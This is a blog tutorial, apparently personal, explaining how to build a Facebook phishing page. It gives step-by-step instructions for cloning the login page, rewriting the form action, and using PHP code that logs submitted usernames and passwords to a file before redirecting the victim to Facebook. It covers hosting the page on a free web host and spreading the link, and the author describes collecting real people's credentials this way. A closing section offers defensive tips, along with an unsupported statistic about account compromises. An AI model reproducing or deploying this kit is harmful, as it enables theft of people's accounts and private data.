*The basic concept*
_____________________________Computer geeks here if not all would have heard of the word “phishing”, or even know what it’s about.
Either you know or not, i will take my time to explain what phishing is all about in this article.
*WHAT IS PHISHING?*Phishing is the process of setting up a fake website or webpage that basically imitates another website. Attackers frequently employ this method to steal usernames and passwords. Most frequently, the process works as follows:
A user clicks on a bad link to a phishing site. Believing they are viewing the intended web page, they enter their login credentials to access the web service. There’s just one problem. The user, who is really the attacker’s victim, actually entered their private information into a hacker’s website. And now the hacker has their login credentials.
*How to make a phishing page*
Note that while this article is for educational purposes, we would not be responsible for any malicious ideas.
Our test subject here is Facebook. But this method can be on any other social media that has a web version.
Pull up Facebook.com in your browser. Then, right click on the website’s login page. You should see an option along the lines of “view source page.” Click on this option and you should be able to view the code behind this page.Go ahead and dump all of the page’s source code into Notepad (or your operating system’s best simple text editor). If using Notepad, hit ctrl f (which is the find hotkey) and search for action. You should see a line that looks like this: action=”https://www.facebook.com/login.php?login_attempt=1″Delete everything contained in the quotations, and instead fill the quotes with post.php. Now it should read action=”post.php”Save this file somewhere on your computer with the file name ofindex.htm. Omit the final period from the filename. This is going to become your phishing page.Next, create a new notepad document with the name of post.php. Omit the final period from the filename. Copy and paste the following code into this document, and remember to save it:
*Note* post.php is a php code or file that captures the login details and saves them to your site. If you don’t know how/what to write on notepad while creating the post.php document, copy and paste the below code into Notepad. 👇
<?php header (‘Location:http://www.facebook.com/’); $handle = fopen(“usernames.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value); fwrite($handle, “rn”);
}
fwrite($handle, “rn”);
fclose($handle);
exit;
?>
Then save it as post.php. And read on. At this point, you should now have two files saved: index.htm andpost.php.Next, this code actually needs to be uploaded to a web hosting service. There are free hosting providers, but I wouldn’t recommend you actually post this code. Instead, it would be better to try this at home on your own webserver. However, for the rest of the tutorial, we’ll be using 000Webhost. After you have signed up for an account, browse to the control panel, and then to file manager.Once the window opens, go topublick_html.Delete default.php, and then upload index.htm and post.php.Next, click on a preview ofindex.htm. As you’ll notice, it should look nearly identical to the Facebook login page.The URL of this page is what needs to be linked to in an attack. Sometimes attackers imbed this false link on other websites, forums, popup ads, and even emails.Now go back to the file managerand public_html. There should be a file labeled username.txt. Open this file and you should be able to see login credentials that have been entered by a test user.
*Final thoughts ðŸ’* It wasn’t as hard as it seemed right? But anyone could be a victim, even you.
*The main knowledge (Escaping the attack)* Although phishing might seem like a old school method of hacking. But this attack still threatens the modern world as more and more people fall victims everyday. In fact, 70%of Facebook accounts are being hacked using this method. +as a computer programmer and social engineer, I have responsibilities towards the world of making it a better place. I had to perform some tasks and experiments in order to balance the negative impact of technology on the world and one of those experiments was me making a phishing page. I made a phishing page using the genuine method known by most hackers and tested it. In fact I had some test subjects which I’ll rather refer to as victims even though there weren’t harmed in the process. I sent them the link, they *_logged in_* and I had their details. If you noticed, I put the term “logged in” in bold and italics and I’ll explain later in the article. So, when I had used the phishing page for some time I sad down and thought, ‘What if it was me?’ I imagined to be in my victim’s shoes. Even if I was and wasn’t sure, how will I escape such attempts of intruding into my privacy. So i began to analyse the source code and logic behind each of them. #Then I found out that the recent changes I made to the original source code of the login page was just the *action* of the Html form that sends the details to the Facebook server and checks the password and email for errors before returning either the login access or login error message to the user. We then exchanged this *Action* with a php file instead. The logic of that was to capture the details and send them to your site instead of Facebook.Com that was initially there. Once the user clicks on the login button, the php code runs and performs its task of creating a file named “usernames.txt” on your website’s file manager and saving the data captured there,in form of a table. But actually there is more to this attack than deceit, which is psychology. The psychology is that when an Internet user is directed to a Facebook log in page, he is expected to input his correct login details to gain access to his account, which is normal maybe because the interface is just like the Facebook login page he or she sees everyday or maybe cos it just says Facebook up in the logo. Well the fact about phishing is that it uses that same psychology. Such that when a user is being sent a link and he clicks on it to see a Facebook login page, he is prompted to login naturally. But a paranoid user will check the link on the browser’s tab if it really says Facebook.com (which Is the normal way of avoiding such attacks), while a normal/desperate user will just go on and login. Take note of the fact that when the victim clicks on the login button, the victim does not login through the form but is instead redirected to Facebook.com which will then appear as a successful login(that is the reason for placing the above recently discussed log in in bold and italics) especially when the person has been using the same computer to access Facebook and has saved his/her password or browser’s self saved cache and cookies. *+Escaping it for sure* Now let’s make this fun a little bit. You received a link that appears to take you to a *_Facebook_* log in page, and the nervous attacker is expecting you to *_log in_*, you might want to take a second look at the link above your tab if it says mhhg.facebook.com or loginmefacebook.com…. Or any funny names containing the word Facebook definitely because the domain name Facebook.com has been taken and can’t be used again. Now when you’ve confirmed the false log in page, smile and try the craziest thing in your life. Try putting wrong login details and see what happens. You still get to login even with the wrong password and username😆, I know it’s crazy right? Well the Good news is no one gets hurt. The paranoid attacker gets the wrong details, while your account gets to be saved. Now you know the logic behind phishing, feel safe on the web.
No comments:
Post a Comment